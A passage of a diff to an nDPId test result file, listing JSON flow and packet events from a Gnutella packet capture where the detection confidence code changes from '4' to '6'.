{"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":40232,"flow_last_seen":40630,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":62539,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":40232,"flow_last_seen":40630,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":50435,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":40232,"flow_last_seen":40630,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":62539,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90743,"flow_last_seen":96110,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1100,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":50301,"dst_port":54130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":40232,"flow_last_seen":40630,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":50435,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90745,"flow_last_seen":91669,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":628,"flow_tot_l4_payload_len":1729,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":50311,"dst_port":49956,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90744,"flow_last_seen":98168,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.238.145.82","src_port":50306,"dst_port":33527,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00792{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90743,"flow_last_seen":101917,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.64.6.175","src_port":50302,"dst_port":4743,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":40005,"flow_last_seen":43055,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":55708,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00620{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":71216,"flow_last_seen":95489,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":12827,"flow_last_seen":41755,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":966,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":40232,"flow_last_seen":40630,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":62539,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":40232,"flow_last_seen":40630,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":50435,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":40232,"flow_last_seen":40630,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":62539,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90743,"flow_last_seen":96110,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1100,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":50301,"dst_port":54130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":40232,"flow_last_seen":40630,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":50435,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90745,"flow_last_seen":91669,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":628,"flow_tot_l4_payload_len":1729,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":50311,"dst_port":49956,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90744,"flow_last_seen":98168,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.238.145.82","src_port":50306,"dst_port":33527,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00792{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90743,"flow_last_seen":101917,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.64.6.175","src_port":50302,"dst_port":4743,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":40005,"flow_last_seen":43055,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":55708,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3451,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":229238,"flow_last_seen":229238,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":229238,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.172.56.198","src_port":28681,"dst_port":11984,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3451,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":370,"flow_packet_id":1,"flow_last_seen":229238,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":119,"pkt_l4_len":85,"thread_ts_msec":229238,"pkt":"UlQAEjUCCAAn5uVZCABFAABpeXIAAIARIJEKAAIPW6w4xnAJLtAAVXM5R05EED9JAQFMQVEyUApVRFBdL+I1CXBBRaArSAlETnBpbmtmbG95ZEANSVVSTABQRlMARE4AQQAQTkFUAF0v4jUxAgBkGsTy6U4JcA8="} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3452,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":229238,"flow_last_seen":229238,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":229238,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.131.202.24","src_port":28681,"dst_port":44748,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -1489,10 +1489,10 @@ 00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3454,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":373,"flow_packet_id":1,"flow_last_seen":229239,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":119,"pkt_l4_len":85,"thread_ts_msec":229239,"pkt":"UlQAEjUCCAAn5uVZCABFAABpd+QAAIARdQcKAAIPWHrpD3AJLOAAVT9CR05EED9MAQFMQVEyUApVRFBdL+I1CXDHjOZsSAlETnBpbmtmbG95ZEANSVVSTABQRlMARE4AQQAQTkFUAF0v4jUxAgBkGsTy6U4JcA8="} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3455,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":229240,"flow_last_seen":229240,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":229240,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"62.35.190.5","src_port":28681,"dst_port":18604,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3455,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":374,"flow_packet_id":1,"flow_last_seen":229240,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":119,"pkt_l4_len":85,"thread_ts_msec":229240,"pkt":"UlQAEjUCCAAn5uVZCABFAABpQyQAAIAR7ygKAAIPPiO+BXAJSKwAVQDtR05EED9NAQFMQVEyUApVRFBdL+I1CXAx8WVwSAlETnBpbmtmbG95ZEANSVVSTABQRlMARE4AQQAQTkFUAF0v4jUxAgBkGsTy6U4JcA8="} -00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3481,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":40005,"flow_last_seen":43055,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":232090,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":55708,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3481,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":12529,"flow_last_seen":43193,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":232090,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3481,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":12529,"flow_last_seen":43193,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":232090,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3580,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":90738,"flow_last_seen":115276,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":242463,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"200.7.155.210","src_port":50291,"dst_port":28365,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3481,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":40005,"flow_last_seen":43055,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":232090,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":55708,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3481,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":12529,"flow_last_seen":43193,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":232090,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3481,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":12529,"flow_last_seen":43193,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":232090,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3580,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":90738,"flow_last_seen":115276,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":242463,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"200.7.155.210","src_port":50291,"dst_port":28365,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00565{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3580,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61191,"flow_last_seen":61191,"flow_idle_time":200000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":242463,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.2","src_port":57619,"dst_port":5351,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00550{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3580,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61191,"flow_last_seen":61191,"flow_idle_time":200000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":242463,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.2","src_port":57619,"dst_port":5351,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00565{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3580,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61470,"flow_last_seen":61470,"flow_idle_time":200000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":242463,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.2","src_port":57620,"dst_port":5351,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -1754,7 +1754,7 @@ 00846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3835,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":414,"flow_packet_id":2,"flow_last_seen":252054,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":351,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":351,"pkt_l4_len":317,"thread_ts_msec":252054,"pkt":"CAAn5uVZUlQAEjUCCABFAAFRCikAAEARFruvtZz0CgACDyA\/cAkBPRaQR05EASwmAQF4nOspZwx09GAJCV7IpZrkwOGyfuucL\/YKSgxA5ul7fKtUoo+BmEVqnEHz4w6DmFpJxQ2LoneAmCrvr076FrIPxLztrlNpZ7EdxKw+W5fmKQLWdjuUO\/SR5kEQ89YS9ZflgSfAzLXPkmy89kNMWCRtJA824U5n1tpM3b1g2yS2Nd0Ig5jgZiDeJq8GYpZ\/Z3v0URXC\/DbZ444gmHmnX+lhup8KiGl7R\/PjVDEmsCOZ7GQ+SyiA1fL1v10UzQBW4LDRdFE0H9gK9VmuD4QYQcxT0+2tT8gKgpiMCwOCLijKg5gF5Z\/yPsmBDVN5yXzfwIgRwtS61CEK9AVbMCQcgAyId4AMiFNAjNaqm2ApiPc8WIIcdRgZGBhi9R+ZGjIxpEgd+fTSj7OAHwDkZn\/e"} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3837,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":463,"flow_packet_id":2,"flow_last_seen":252237,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":252237,"pkt":"CAAn5uVZUlQAEjUCCABFAABKCisAAEARAJDIB5vSCgACD27NcAkANlqcvVsxAoZuEFj\/eIRjgIUUAwEBABcAAADNbsgHm9IAAAAACAAAAMOCUUtEApadXA=="} 